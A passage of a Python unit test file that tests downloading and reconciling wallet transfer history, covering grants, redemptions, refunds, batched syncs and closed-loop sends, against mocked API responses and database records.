self.assertEqual(Decimal('1.00'), fm.vault_delta)
events = self.dbsession.query(db.FileMovementLog).all()
self.assertEqual(1, len(events))
event = events[0]
self.assertEqual('sync_file_movements', event.event_type)
recos = self.dbsession.query(db.Reco).all()
self.assertEqual(0, len(recos))
@responses.activate
def test_grant_from_recipient_perspective(self):
from opnreco.models import db
responses.add(
responses.POST,
'https://opn.example.com:9999/wallet/history_sync',
json={
'results': [{
'id': '501',
'workflow_type': 'grant',
'start': '2018-08-01T04:05:06Z',
'currency': 'USD',
'amount': '1.25',
'timestamp': '2018-08-01T04:05:08Z',
'next_activity': 'completed',
'completed': True,
'canceled': False,
'sender_id': '19',
'sender_uid': 'wingcash:19',
'sender_info': {
'title': "Issuer",
},
'recipient_id': '11',
'recipient_uid': 'wingcash:11',
'recipient_info': {
'title': "Some Tester",
},
'movements': [
{
# Issued $1.00
'number': 2,
'timestamp': '2018-08-02T05:06:07Z',
'action': 'grant',
'from_id': '19',
'to_id': '11',
'loops': [{
'currency': 'USD',
'loop_id': '0',
'amount': '1.00',
'issuer_id': '19',
}],
}, {
# Issued $0.25
'number': 3,
'timestamp': '2018-08-02T05:06:09Z',
'action': 'grant',
'from_id': '19',
'to_id': '11',
'loops': [{
'currency': 'USD',
'loop_id': '0',
'amount': '0.25',
'issuer_id': '19',
}],
},
],
}],
'more': False,
'first_sync_ts': '2018-08-01T04:05:10Z',
'last_sync_ts': '2018-08-01T04:05:11Z',
})
responses.add(
responses.GET,
'https://opn.example.com:9999/p/19',
json={'title': "Super Bank 19", 'username': 'bank19'})
responses.add(
responses.GET,
'https://opn.example.com:9999/p/1102',
json={'title': "Tester's Super Bank Checking Account"})
obj = self._make(owner_id='11')
obj()
downloads = self.dbsession.query(db.OPNDownload).all()
self.assertEqual(1, len(downloads))
self.assertEqual('11', downloads[0].owner_id)
events = self.dbsession.query(db.OwnerLog).all()
self.assertEqual([
'opn_sync',
'peer_add',
'peer_add',
'add_period_for_sync',
], [e.event_type for e in events])
event = events[0]
self.assertEqual('11', event.owner_id)
self.assertEqual('opn_sync', event.event_type)
self.assertEqual(
{'sync_ts', 'progress_percent', 'transfers', 'change_count'},
set(event.content.keys()))
records = self.dbsession.query(db.TransferRecord).all()
self.assertEqual(1, len(records))
record = records[0]
self.assertEqual('grant', record.workflow_type)
self.assertEqual(
datetime.datetime(2018, 8, 1, 4, 5, 6), record.start)
self.assertEqual(
datetime.datetime(2018, 8, 1, 4, 5, 8), record.timestamp)
self.assertEqual(True, record.completed)
self.assertEqual(False, record.canceled)
self.assertEqual('19', record.sender_id)
self.assertEqual('wingcash:19', record.sender_uid)
self.assertEqual('11', record.recipient_id)
self.assertEqual('wingcash:11', record.recipient_uid)
peers = self.dbsession.query(db.Peer).order_by(db.Peer.peer_id).all()
self.assertEqual(2, len(peers))
self.assertEqual('11', peers[0].owner_id)
self.assertEqual('11', peers[0].peer_id)
self.assertEqual('Test Profile', peers[0].title)
self.assertEqual('testy', peers[0].username)
self.assertEqual(False, peers[0].is_dfi_account)
self.assertEqual('11', peers[1].owner_id)
self.assertEqual('19', peers[1].peer_id)
self.assertEqual('Issuer', peers[1].title)
self.assertEqual(None, peers[1].username)
self.assertEqual(False, peers[1].is_dfi_account)
periods = self.dbsession.query(db.Period).all()
self.assertEqual(1, len(periods))
period = periods[0]
self.assertEqual('11', period.owner_id)
self.assertEqual(1239, period.file_id)
movements = (
self.dbsession.query(db.FileMovement, db.Movement)
.join(db.Movement, db.FileMovement.movement_id == db.Movement.id)
.order_by(db.Movement.id)
.all())
self.assertEqual(2, len(movements))
fm, m = movements[0]
self.assertEqual(record.id, m.transfer_record_id)
self.assertEqual('0', m.loop_id)
self.assertEqual('USD', m.currency)
self.assertEqual('19', fm.peer_id)
self.assertEqual(Decimal('1.00'), fm.wallet_delta)
fm, m = movements[1]
self.assertEqual(record.id, m.transfer_record_id)
self.assertEqual('0', m.loop_id)
self.assertEqual('USD', m.currency)
self.assertEqual('19', fm.peer_id)
self.assertEqual(Decimal('0.25'), fm.wallet_delta)
events = self.dbsession.query(db.FileMovementLog).all()
self.assertEqual(2, len(events))
event = events[0]
self.assertEqual('sync_file_movements', event.event_type)
@responses.activate
def test_grant_from_issuer_perspective(self):
from opnreco.models import db
responses.add(
responses.POST,
'https://opn.example.com:9999/wallet/history_sync',
json={
'results': [{
'id': '501',
'workflow_type': 'grant',
'start': '2018-08-01T04:05:06Z',
'currency': 'USD',
'amount': '1.25',
'timestamp': '2018-08-01T04:05:08Z',
'next_activity': 'completed',
'completed': True,
'canceled': False,
'sender_id': '19',
'sender_uid': 'wingcash:19',
'sender_info': {
'title': "Issuer",
},
'recipient_id': '11',
'recipient_uid': 'wingcash:11',
'recipient_info': {
'title': "Some Tester",
},
'movements': [
{
# Issuance movement
'number': 1,
'timestamp': '2018-08-02T05:06:06Z',
'action': 'issue',
'from_id': None,
'to_id': '19',
'loops': [{
'currency': 'USD',
'loop_id': '0',
'amount': '1.25',
'issuer_id': '19',
}],
}, {
# Issued $1.00
'number': 2,
'timestamp': '2018-08-02T05:06:07Z',
'action': 'grant',
'from_id': '19',
'to_id': '11',
'loops': [{
'currency': 'USD',
'loop_id': '0',
'amount': '1.00',
'issuer_id': '19',
}],
}, {
# Issued $0.25
'number': 3,
'timestamp': '2018-08-02T05:06:07Z',
'action': 'grant',
'from_id': '19',
'to_id': '11',
'loops': [{
'currency': 'USD',
'loop_id': '0',
'amount': '0.25',
'issuer_id': '19',
}],
},
],
}],
'more': False,
'first_sync_ts': '2018-08-01T04:05:10Z',
'last_sync_ts': '2018-08-01T04:05:11Z',
})
obj = self._make(owner_id='19')
obj()
downloads = self.dbsession.query(db.OPNDownload).all()
self.assertEqual(1, len(downloads))
self.assertEqual('19', downloads[0].owner_id)
events = (
self.dbsession.query(db.OwnerLog)
.order_by(db.OwnerLog.id)
.all())
self.assertEqual([
'opn_sync',
'peer_add',
'peer_add',
'add_period_for_sync',
], [e.event_type for e in events])
event = events[0]
self.assertEqual('19', event.owner_id)
self.assertEqual(
{'sync_ts', 'progress_percent', 'transfers', 'change_count'},
set(event.content.keys()))
records = self.dbsession.query(db.TransferRecord).all()
self.assertEqual(1, len(records))
record = records[0]
self.assertEqual('grant', record.workflow_type)
self.assertEqual(
datetime.datetime(2018, 8, 1, 4, 5, 6), record.start)
self.assertEqual(
datetime.datetime(2018, 8, 1, 4, 5, 8), record.timestamp)
self.assertEqual(True, record.completed)
self.assertEqual(False, record.canceled)
self.assertEqual('19', record.sender_id)
self.assertEqual('wingcash:19', record.sender_uid)
self.assertEqual('11', record.recipient_id)
self.assertEqual('wingcash:11', record.recipient_uid)
periods = (
self.dbsession.query(db.Period)
.all())
self.assertEqual(1, len(periods))
period = periods[0]
self.assertEqual('19', period.owner_id)
self.assertEqual(1239, period.file_id)
movements = (
self.dbsession.query(db.Movement, db.FileMovement)
.outerjoin(
db.FileMovement, db.FileMovement.movement_id == db.Movement.id)
.order_by(db.Movement.id)
.all())
self.assertEqual(3, len(movements))
m, fm = movements[0]
self.assertIsNone(fm)
self.assertEqual(record.id, m.transfer_record_id)
self.assertEqual('0', m.loop_id)
self.assertEqual('USD', m.currency)
m, fm = movements[1]
self.assertEqual(record.id, m.transfer_record_id)
self.assertEqual('0', m.loop_id)
self.assertEqual('USD', m.currency)
self.assertEqual('11', fm.peer_id)
self.assertEqual(Decimal('-1.00'), fm.vault_delta)
self.assertEqual(zero, fm.wallet_delta)
m, fm = movements[2]
self.assertEqual(record.id, m.transfer_record_id)
self.assertEqual('0', m.loop_id)
self.assertEqual('USD', m.currency)
self.assertEqual('11', fm.peer_id)
self.assertEqual(Decimal('-0.25'), fm.vault_delta)
self.assertEqual(zero, fm.wallet_delta)
events = self.dbsession.query(db.FileMovementLog).all()
self.assertEqual(2, len(events))
event = events[0]
self.assertEqual('sync_file_movements', event.event_type)
def test_redownload_with_updates(self):
from opnreco.models import db
def _make_transfer_result():
return {
'id': '500',
'workflow_type': 'redeem',
'start': '2018-08-01T04:05:06Z',
'currency': 'USD',
'amount': '1.00',
'timestamp': '2018-08-01T04:05:08Z',
'next_activity': 'someactivity',
'completed': False,
'canceled': False,
'sender_id': '11',
'sender_uid': 'wingcash:11',
'sender_info': {
'title': "Tester",
},
'recipient_id': '1102',
'recipient_uid': 'wingcash:1102',
'recipient_info': {
'title': "Acct",
},
# No movements yet.
'movements': [],
}
with responses.RequestsMock() as rsps:
rsps.add(
responses.POST,
'https://opn.example.com:9999/wallet/history_sync',
json={
'results': [_make_transfer_result()],
'more': False,
'first_sync_ts': '2018-08-01T04:05:10Z',
'last_sync_ts': '2018-08-01T04:05:11Z',
})
obj = self._make(owner_id='19')
obj()
downloads = self.dbsession.query(db.OPNDownload).all()
self.assertEqual(1, len(downloads))
self.assertEqual('19', downloads[0].owner_id)
events = (
self.dbsession.query(db.OwnerLog).order_by(db.OwnerLog.id).all())
self.assertEqual(4, len(events))
event = events[0]
self.assertEqual('19', event.owner_id)
self.assertEqual('opn_sync', event.event_type)
self.assertEqual(
{'sync_ts', 'progress_percent', 'transfers', 'change_count'},
set(event.content.keys()))
records = self.dbsession.query(db.TransferRecord).all()
self.assertEqual(1, len(records))
record = records[0]
self.assertEqual('redeem', record.workflow_type)
self.assertEqual(
datetime.datetime(2018, 8, 1, 4, 5, 6), record.start)
self.assertEqual(
datetime.datetime(2018, 8, 1, 4, 5, 8), record.timestamp)
self.assertEqual(False, record.completed)
self.assertEqual(False, record.canceled)
self.assertEqual('11', record.sender_id)
self.assertEqual('wingcash:11', record.sender_uid)
self.assertEqual('1102', record.recipient_id)
self.assertEqual('wingcash:1102', record.recipient_uid)
periods = self.dbsession.query(db.Period).all()
self.assertEqual(0, len(periods))
ms = self.dbsession.query(db.Movement).all()
self.assertEqual(0, len(ms))
recos = self.dbsession.query(db.Reco).all()
self.assertEqual(0, len(recos))
# Simulate the transfer completing the return of the cash
# to the issuer and re-download.
result1 = _make_transfer_result()
result1['movements'] = [{
'number': 1,
'timestamp': '2018-08-02T05:06:06Z',
'action': 'redeem',
'from_id': '1102',
'to_id': '19',
'loops': [{
'currency': 'USD',
'loop_id': '0',
'amount': '1.00',
'issuer_id': '19',
}],
}]
with responses.RequestsMock() as rsps:
rsps.add(
responses.POST,
'https://opn.example.com:9999/wallet/history_sync',
json={
'results': [result1],
'more': False,
'first_sync_ts': '2018-08-01T04:05:10Z',
'last_sync_ts': '2018-08-01T04:05:11Z',
})
obj()
events = (
self.dbsession.query(db.OwnerLog)
.order_by(db.OwnerLog.id).all())
self.assertEqual(6, len(events))
event = events[0]
self.assertEqual('19', event.owner_id)
self.assertEqual('opn_sync', event.event_type)
self.assertEqual(
{'sync_ts', 'progress_percent', 'transfers', 'change_count'},
set(event.content.keys()))
records = self.dbsession.query(db.TransferRecord).all()
self.assertEqual(1, len(records))
self.assertFalse(records[0].canceled)
periods = self.dbsession.query(db.Period).all()
self.assertEqual(1, len(periods))
period = periods[0]
self.assertEqual('19', period.owner_id)
self.assertEqual(1239, period.file_id)
movements = (
self.dbsession.query(db.FileMovement, db.Movement)
.join(db.Movement, db.FileMovement.movement_id == db.Movement.id)
.order_by(db.Movement.id)
.all())
self.assertEqual(1, len(movements))
fm, m = movements[0]
self.assertEqual(record.id, m.transfer_record_id)
self.assertEqual('0', m.loop_id)
self.assertEqual('USD', m.currency)
self.assertEqual('1102', fm.peer_id)
self.assertEqual(Decimal('1.00'), fm.vault_delta)
# Simulate a failed redemption: the issuer re-issues cash to
# the profile. Re-download.
result1 = _make_transfer_result()
result1['canceled'] = True
result1['next_activity'] = 'canceled'
result1['movements'] = [
# The redeem movement remains.
{
'number': 1,
'timestamp': '2018-08-02T05:06:06Z',
'action': 'redeem',
'from_id': '1102',
'to_id': '19',
'loops': [{
'currency': 'USD',
'loop_id': '0',
'amount': '1.00',
'issuer_id': '19',
}],
},
# The refund movement offsets the original movement.
{
'number': 2,
'timestamp': '2018-08-02T05:06:07Z',
'action': 'refund',
'from_id': '19',
'to_id': '1102',
'loops': [{
'currency': 'USD',
'loop_id': '0',
'amount': '1.00',
'issuer_id': '19',
}],
},
]
with responses.RequestsMock() as rsps:
rsps.add(
responses.POST,
'https://opn.example.com:9999/wallet/history_sync',
json={
'results': [result1],
'more': False,
'first_sync_ts': '2018-08-01T04:05:10Z',
'last_sync_ts': '2018-08-01T04:05:11Z',
})
obj()
events = (
self.dbsession.query(db.OwnerLog)
.order_by(db.OwnerLog.id).all())
self.assertEqual(7, len(events))
event = events[-1]
self.assertEqual('19', event.owner_id)
self.assertEqual('opn_sync', event.event_type)
self.assertEqual(
{'sync_ts', 'progress_percent', 'transfers', 'change_count'},
set(event.content.keys()))
records = self.dbsession.query(db.TransferRecord).all()
self.assertEqual(1, len(records))
self.assertTrue(records[0].canceled)
periods = self.dbsession.query(db.Period).all()
self.assertEqual(1, len(periods))
period = periods[0]
self.assertEqual('19', period.owner_id)
self.assertEqual(1239, period.file_id)
movements = (
self.dbsession.query(db.FileMovement, db.Movement)
.join(db.Movement, db.FileMovement.movement_id == db.Movement.id)
.order_by(db.Movement.id)
.all())
self.assertEqual(2, len(movements))
fm, m = movements[0]
self.assertEqual(record.id, m.transfer_record_id)
self.assertEqual('0', m.loop_id)
self.assertEqual('USD', m.currency)
self.assertEqual('1102', fm.peer_id)
self.assertEqual(Decimal('1.00'), fm.vault_delta)
fm, m = movements[1]
self.assertEqual(record.id, m.transfer_record_id)
self.assertEqual('0', m.loop_id)
self.assertEqual('USD', m.currency)
self.assertEqual('1102', fm.peer_id)
self.assertEqual(Decimal('-1.00'), fm.vault_delta)
def test_redownload_with_no_movements_and_no_updates(self):
from opnreco.models import db
def _make_transfer_result():
return {
'id': '500',
'workflow_type': 'redeem',
'start': '2018-08-01T04:05:06Z',
'currency': 'USD',
'amount': '1.00',
'timestamp': '2018-08-01T04:05:08Z',
'next_activity': 'send_to_dfi',
'completed': False,
'canceled': False,
'sender_id': '11',
'sender_uid': 'wingcash:11',
'sender_info': {
'title': "Tester",
},
'recipient_id': '1102',
'recipient_uid': 'wingcash:1102',
'recipient_info': {
'title': "Acct",
},
# No movements yet.
'movements': [],
}
with responses.RequestsMock() as rsps:
rsps.add(
responses.POST,
'https://opn.example.com:9999/wallet/history_sync',
json={
'results': [_make_transfer_result()],
'more': False,
'first_sync_ts': '2018-08-01T04:05:10Z',
'last_sync_ts': '2018-08-01T04:05:11Z',
})
obj = self._make(owner_id='19')
obj()
periods = self.dbsession.query(db.Period).all()
self.assertEqual(0, len(periods))
movements = (
self.dbsession.query(db.Movement)
.order_by(db.Movement.number)
.all())
self.assertEqual(0, len(movements))
result1 = _make_transfer_result()
with responses.RequestsMock() as rsps:
rsps.add(
responses.POST,
'https://opn.example.com:9999/wallet/history_sync',
json={
'results': [result1],
'more': False,
'first_sync_ts': '2018-08-01T04:05:10Z',
'last_sync_ts': '2018-08-01T04:05:11Z',
})
obj()
movements = self.dbsession.query(db.Movement).all()
self.assertEqual(0, len(movements))
def test_redownload_with_movements_but_no_updates(self):
from opnreco.models import db
def _make_transfer_result():
return {
'id': '500',
'workflow_type': 'redeem',
'start': '2018-08-01T04:05:06Z',
'currency': 'USD',
'amount': '1.00',
'timestamp': '2018-08-01T04:05:08Z',
'next_activity': 'send_to_dfi',
'completed': False,
'canceled': False,
'sender_id': '11',
'sender_uid': 'wingcash:11',
'sender_info': {
'title': "Tester",
},
'recipient_id': '1102',
'recipient_uid': 'wingcash:1102',
'recipient_info': {
'title': "Acct",
},
'movements': [
{
'number': 1,
'timestamp': '2018-08-02T05:06:06Z',
'action': 'redeem',
'from_id': '1102',
'to_id': '19',
'loops': [{
'currency': 'USD',
'loop_id': '0',
'amount': '1.00',
'issuer_id': '19',
}],
},
],
}
with responses.RequestsMock() as rsps:
rsps.add(
responses.POST,
'https://opn.example.com:9999/wallet/history_sync',
json={
'results': [_make_transfer_result()],
'more': False,
'first_sync_ts': '2018-08-01T04:05:10Z',
'last_sync_ts': '2018-08-01T04:05:11Z',
})
obj = self._make(owner_id='19')
obj()
periods = self.dbsession.query(db.Period).all()
self.assertEqual(1, len(periods))
period = periods[0]
self.assertEqual('19', period.owner_id)
self.assertEqual(1239, period.file_id)
movements = (
self.dbsession.query(db.Movement, db.FileMovement)
.outerjoin(
db.FileMovement, db.FileMovement.movement_id == db.Movement.id)
.order_by(db.Movement.id)
.all())
self.assertEqual(1, len(movements))
m, fm = movements[0]
self.assertEqual('0', m.loop_id)
self.assertEqual('USD', m.currency)
self.assertEqual('1102', fm.peer_id)
self.assertEqual(Decimal('1.00'), fm.vault_delta)
result1 = _make_transfer_result()
with responses.RequestsMock() as rsps:
rsps.add(
responses.POST,
'https://opn.example.com:9999/wallet/history_sync',
json={
'results': [result1],
'more': False,
'first_sync_ts': '2018-08-01T04:05:10Z',
'last_sync_ts': '2018-08-01T04:05:11Z',
})
obj()
mss = self.dbsession.query(db.Movement).all()
self.assertEqual(1, len(mss))
def test_redownload_with_profile_updates(self):
from opnreco.models import db
def _make_transfer_result():
return {
'id': '500',
'workflow_type': 'return',
'start': '2018-08-01T04:05:06Z',
'currency': 'USD',
'amount': '1.00',
'timestamp': '2018-08-01T04:05:08Z',
'next_activity': 'send_to_dfi',
'completed': False,
'canceled': False,
'sender_id': '11',
'sender_uid': 'wingcash:11',
'sender_info': {
'title': "Tester",
},
'recipient_id': '19',
'recipient_uid': 'wingcash:19',
'recipient_info': {
'title': "Issuer",
},
'movements': [
{
'number': 1,
'timestamp': '2018-08-02T05:06:06Z',
'action': 'redeem',
'from_id': '11',
'to_id': '19',
'loops': [{
'currency': 'USD',
'loop_id': '0',
'amount': '1.00',
'issuer_id': '19',
}],
},
],
}
with responses.RequestsMock() as rsps:
rsps.add(
responses.POST,
'https://opn.example.com:9999/wallet/history_sync',
json={
'results': [_make_transfer_result()],
'more': False,
'first_sync_ts': '2018-08-01T04:05:10Z',
'last_sync_ts': '2018-08-01T04:05:11Z',
})
obj = self._make(owner_id='19')
obj()
periods = self.dbsession.query(db.Period).all()
self.assertEqual(1, len(periods))
period = periods[0]
self.assertEqual('19', period.owner_id)
self.assertEqual(1239, period.file_id)
mss = self.dbsession.query(db.Movement).all()
self.assertEqual(1, len(mss))
movements = (
self.dbsession.query(db.Movement, db.FileMovement)
.outerjoin(
db.FileMovement, db.FileMovement.movement_id == db.Movement.id)
.order_by(db.Movement.id)
.all())
self.assertEqual(1, len(movements))
m, fm = movements[0]
self.assertEqual('0', m.loop_id)
self.assertEqual('USD', m.currency)
self.assertEqual('11', fm.peer_id)
self.assertEqual(Decimal('1.00'), fm.vault_delta)
result1 = _make_transfer_result()
result1['sender_info']['screen_name'] = 'somefella'
with responses.RequestsMock() as rsps:
rsps.add(
responses.POST,
'https://opn.example.com:9999/wallet/history_sync',
json={
'results': [result1],
'more': False,
'first_sync_ts': '2018-08-01T04:05:10Z',
'last_sync_ts': '2018-08-01T04:05:11Z',
})
obj()
mss = self.dbsession.query(db.Movement).all()
self.assertEqual(1, len(mss))
events = (
self.dbsession.query(db.OwnerLog)
.order_by(db.OwnerLog.id)
.all())
self.assertEqual([
'opn_sync',
'peer_add',
'peer_add',
'add_period_for_sync',
'opn_sync',
'peer_update',
], [e.event_type for e in events])
self.assertEqual({
'changes': {'username': 'somefella'},
'peer_id': '11',
}, events[-1].content)
def test_verification_failure_due_to_changed_workflow_type(self):
from pyramid.httpexceptions import HTTPInsufficientStorage
def _make_transfer_result():
return {
'id': '500',
'workflow_type': 'redeem',
'start': '2018-08-01T04:05:06Z',
'currency': 'USD',
'amount': '1.00',
'timestamp': '2018-08-01T04:05:08Z',
'next_activity': 'send_to_dfi',
'completed': False,
'canceled': False,
'sender_id': '11',
'sender_uid': 'wingcash:11',
'sender_info': {
'title': "Tester",
},
'recipient_id': '1102',
'recipient_uid': 'wingcash:1102',
'recipient_info': {
'title': "Acct",
},
'movements': [
{
'number': 1,
'timestamp': '2018-08-02T05:06:06Z',
'action': 'redeem',
'from_id': '1102',
'to_id': '19',
'loops': [{
'currency': 'USD',
'loop_id': '0',
'amount': '1.00',
'issuer_id': '19',
}],
},
],
}
with responses.RequestsMock() as rsps:
rsps.add(
responses.POST,
'https://opn.example.com:9999/wallet/history_sync',
json={
'results': [_make_transfer_result()],
'more': False,
'first_sync_ts': '2018-08-01T04:05:10Z',
'last_sync_ts': '2018-08-01T04:05:11Z',
})
obj = self._make(owner_id='19')
obj()
result1 = _make_transfer_result()
result1['workflow_type'] = 'raspberry'
with responses.RequestsMock() as rsps:
rsps.add(
responses.POST,
'https://opn.example.com:9999/wallet/history_sync',
json={
'results': [result1],
'more': False,
'first_sync_ts': '2018-08-01T04:05:10Z',
'last_sync_ts': '2018-08-01T04:05:11Z',
})
with self.assertRaises(HTTPInsufficientStorage) as cm:
obj()
self.assertRegexpMatches(
cm.exception.json['error_description'],
r'Immutable attribute changed')
def test_download_batches(self):
from opnreco.models import db
def _make_transfer_result():
return {
'id': '501',
'workflow_type': 'grant',
'start': '2018-08-01T04:05:06Z',
'currency': 'USD',
'amount': '1.00',
'timestamp': '2018-08-01T04:05:08Z',
'next_activity': 'someactivity',
'completed': False,
'canceled': False,
'sender_id': '19',
'sender_uid': 'wingcash:19',
'sender_info': {
'title': "Issuer",
},
'recipient_id': '11',
'recipient_uid': 'wingcash:11',
'recipient_info': {
'title': "Tester",
},
'movements': [
{
'number': 1,
'timestamp': '2018-08-02T05:06:06Z',
'action': 'redeem',
'from_id': '19',
'to_id': '11',
'loops': [{
'currency': 'USD',
'loop_id': '0',
'amount': '1.00',
'issuer_id': '19',
}],
},
],
}
with responses.RequestsMock() as rsps:
rsps.add(
responses.POST,
'https://opn.example.com:9999/wallet/history_sync',
json={
'results': [_make_transfer_result()],
'more': True,
'first_sync_ts': '2018-08-01T04:05:10Z',
'last_sync_ts': '2018-08-01T04:05:11Z',
'remain': 1,
})
obj = self._make(owner_id='11')
download_status = obj()
self.assertGreaterEqual(download_status['progress_percent'], 0.0)
self.assertLessEqual(download_status['progress_percent'], 100.0)
self.assertEqual({
'change_count': 5,
'download_count': 1,
'first_sync_ts': '2018-08-01T04:05:10Z',
'last_sync_ts': '2018-08-01T04:05:11Z',
'more': True,
'progress_percent': 50,
}, download_status)
downloads = self.dbsession.query(db.OPNDownload).all()
self.assertEqual(1, len(downloads))
self.assertEqual('11', downloads[0].owner_id)
events = self.dbsession.query(db.OwnerLog).all()
self.assertEqual([
'opn_sync',
'peer_add',
'peer_add',
'add_period_for_sync',
], [e.event_type for e in events])
event = events[0]
self.assertEqual('11', event.owner_id)
self.assertEqual(
{'sync_ts', 'progress_percent', 'transfers', 'change_count'},
set(event.content.keys()))
period = self.dbsession.query(db.Period).one()
mss = (
self.dbsession.query(db.Movement)
.filter_by(loop_id='0', currency='USD')
.all())
self.assertEqual(1, len(mss))
mvlog_entries = (
self.dbsession.query(db.FileMovementLog)
.all())
self.assertEqual(1, len(mvlog_entries))
# Download the last batch.
with responses.RequestsMock() as rsps:
transfer_result = _make_transfer_result()
transfer_result['id'] = '502'
rsps.add(
responses.POST,
'https://opn.example.com:9999/wallet/history_sync',
json={
'results': [transfer_result],
'more': False,
'first_sync_ts': '2018-08-01T04:05:10Z',
'last_sync_ts': '2018-08-01T04:05:11Z',
})
download_status = obj()
self.assertEqual({
'change_count': 7,
'download_count': 1,
'first_sync_ts': '2018-08-01T04:05:10Z',
'last_sync_ts': '2018-08-01T04:05:11Z',
'more': False,
'progress_percent': 100,
}, download_status)
events = (
self.dbsession.query(db.OwnerLog)
.order_by(db.OwnerLog.id).all())
self.assertEqual([
'opn_sync',
'peer_add',
'peer_add',
'add_period_for_sync',
'opn_sync',
], [e.event_type for e in events])
event = events[-1]
self.assertEqual('11', event.owner_id)
self.assertEqual(
{'sync_ts', 'progress_percent', 'transfers', 'change_count'},
set(event.content.keys()))
records = (
self.dbsession.query(db.TransferRecord)
.order_by(db.TransferRecord.id).all())
self.assertEqual(2, len(records))
record = records[-1]
self.assertFalse(record.canceled)
self.assertEqual('502', record.transfer_id)
periods = self.dbsession.query(db.Period).all()
self.assertEqual(1, len(periods))
period = periods[0]
self.assertEqual('11', period.owner_id)
self.assertEqual(1239, period.file_id)
movements = (
self.dbsession.query(db.Movement, db.FileMovement)
.outerjoin(
db.FileMovement, db.FileMovement.movement_id == db.Movement.id)
.order_by(db.Movement.id)
.all())
self.assertEqual(2, len(movements))
m, fm = movements[0]
self.assertEqual(records[0].id, m.transfer_record_id)
self.assertEqual('0', m.loop_id)
self.assertEqual('USD', m.currency)
self.assertEqual('19', fm.peer_id)
self.assertEqual(Decimal('1.00'), fm.wallet_delta)
m, fm = movements[1]
self.assertEqual(records[1].id, m.transfer_record_id)
self.assertEqual('0', m.loop_id)
self.assertEqual('USD', m.currency)
self.assertEqual('19', fm.peer_id)
self.assertEqual(Decimal('1.00'), fm.wallet_delta)
mvlogs = (
self.dbsession.query(db.FileMovementLog)
.order_by(db.FileMovementLog.id)
.all())
self.assertEqual(2, len(mvlogs))
mvlog = mvlogs[0]
self.assertEqual('sync_file_movements', mvlog.event_type)
mvlog = mvlogs[1]
self.assertEqual('sync_file_movements', mvlog.event_type)
@responses.activate
def test_closed_loop_send_design(self):
# Reconcile closed loop cash for the distributor (profile 12).
# The issuer is profile 15 and the recipient is profile 11.
from opnreco.models import db
responses.add(
responses.POST,
'https://opn.example.com:9999/wallet/history_sync',
json={
'results': [{
'id': '501',
'workflow_type': 'send_design',
'start': '2018-08-01T04:05:06Z',
'currency': 'USD',
'amount': '1.25',
'timestamp': '2018-08-01T04:05:08Z',
'next_activity': 'completed',
'completed': True,
'canceled': False,
'sender_id': '12',
'sender_uid': 'wingcash:12',
'sender_info': {
'title': "Issuer",
},
'recipient_id': '11',
'recipient_uid': 'wingcash:11',
'recipient_info': {
'title': "Some Tester",
},
'movements': [
{
# Note creation movement
'number': 1,
'timestamp': '2018-08-02T05:06:06Z',
'action': 'issue',
'from_id': None,
'to_id': '15',
'loops': [{
'currency': 'USD',
'loop_id': '41',
'amount': '1.25',
'issuer_id': '15',
}],
}, {
# Issued $1.00 to the distributor (profile 12)
'number': 2,
'timestamp': '2018-08-02T05:06:07Z',
'action': 'issue',
'from_id': '15',
'to_id': '12',
'loops': [{
'currency': 'USD',
'loop_id': '41',
'amount': '1.00',
'issuer_id': '15',
}],
}, {
# Issued $0.25 to the distributor (profile 12)
'number': 3,
'timestamp': '2018-08-02T05:06:07Z',
'action': 'issue',
'from_id': '15',
'to_id': '12',
'loops': [{
'currency': 'USD',
'loop_id': '41',
'amount': '0.25',
'issuer_id': '15',
}],
}, {
# Sent from the distributor (profile 12)
# to the recipient (profile 11)
'number': 4,
'timestamp': '2018-08-02T05:06:07Z',
'action': 'send',
'from_id': '12',
'to_id': '11',
'loops': [{
'currency': 'USD',
'loop_id': '41',
'amount': '1.25',
'issuer_id': '15',
}],
},
],
}],
'more': False,
'first_sync_ts': '2018-08-01T04:05:10Z',
'last_sync_ts': '2018-08-01T04:05:11Z',
})
# This is file is a reconciliation for the distributor (profile 12).
obj = self._make(
owner_id='12',
file_type='closed_circ',
auto_enable_loops=True)
obj()
downloads = self.dbsession.query(db.OPNDownload).all()
self.assertEqual(1, len(downloads))
self.assertEqual('12', downloads[0].owner_id)
events = (
self.dbsession.query(db.OwnerLog)
.order_by(db.OwnerLog.id)
.all())
self.assertEqual([
'opn_sync',
'peer_add',
'peer_add',
'add_file_loop_config',
'add_period_for_sync',
], [e.event_type for e in events])
event = events[0]
self.assertEqual('12', event.owner_id)
self.assertEqual(
{'sync_ts', 'progress_percent', 'transfers', 'change_count'},
set(event.content.keys()))
records = self.dbsession.query(db.TransferRecord).all()
self.assertEqual(1, len(records))
record = records[0]
self.assertEqual('send_design', record.workflow_type)
self.assertEqual(
datetime.datetime(2018, 8, 1, 4, 5, 6), record.start)
self.assertEqual(
datetime.datetime(2018, 8, 1, 4, 5, 8), record.timestamp)
self.assertEqual(True, record.completed)
self.assertEqual(False, record.canceled)
self.assertEqual('12', record.sender_id)
self.assertEqual('wingcash:12', record.sender_uid)
self.assertEqual('11', record.recipient_id)
self.assertEqual('wingcash:11', record.recipient_uid)
periods = (
self.dbsession.query(db.Period)
.all())
self.assertEqual(1, len(periods))
period = periods[0]
self.assertEqual('12', period.owner_id)
self.assertEqual(1239, period.file_id)
movements = (
self.dbsession.query(db.Movement, db.FileMovement)
.outerjoin(
db.FileMovement, db.FileMovement.movement_id == db.Movement.id)
.order_by(db.Movement.id)
.all())
self.assertEqual(4, len(movements))
m, fm = movements[0]
self.assertIsNone(fm) # Don't reconcile the note creation
self.assertEqual(record.id, m.transfer_record_id)
self.assertEqual('41', m.loop_id)
self.assertEqual('USD', m.currency)
m, fm = movements[1]
self.assertIsNone(fm)
self.assertEqual(record.id, m.transfer_record_id)
self.assertEqual('41', m.loop_id)
self.assertEqual('USD', m.currency)
m, fm = movements[2]
self.assertIsNone(fm)
self.assertEqual(record.id, m.transfer_record_id)
self.assertEqual('41', m.loop_id)
self.assertEqual('USD', m.currency)
m, fm = movements[3]
self.assertEqual(record.id, m.transfer_record_id)
self.assertEqual('41', m.loop_id)
self.assertEqual('USD', m.currency)
self.assertEqual('11', fm.peer_id)
self.assertEqual(Decimal('-1.25'), fm.vault_delta)
self.assertEqual(zero, fm.wallet_delta)
events = self.dbsession.query(db.FileMovementLog).all()
self.assertEqual(1, len(events))
event = events[0]
self.assertEqual('sync_file_movements', event.event_type)
| 36.903717
| 79
| 0.470632
| 5,760
| 60,559
| 4.80816
| 0.050347
| 0.165192
| 0.0577
| 0.051995
| 0.886225
| 0.869688
| 0.849359
| 0.842788
| 0.838202
| 0.830547
| 0
| 0.064158
| 0.396968
| 60,559
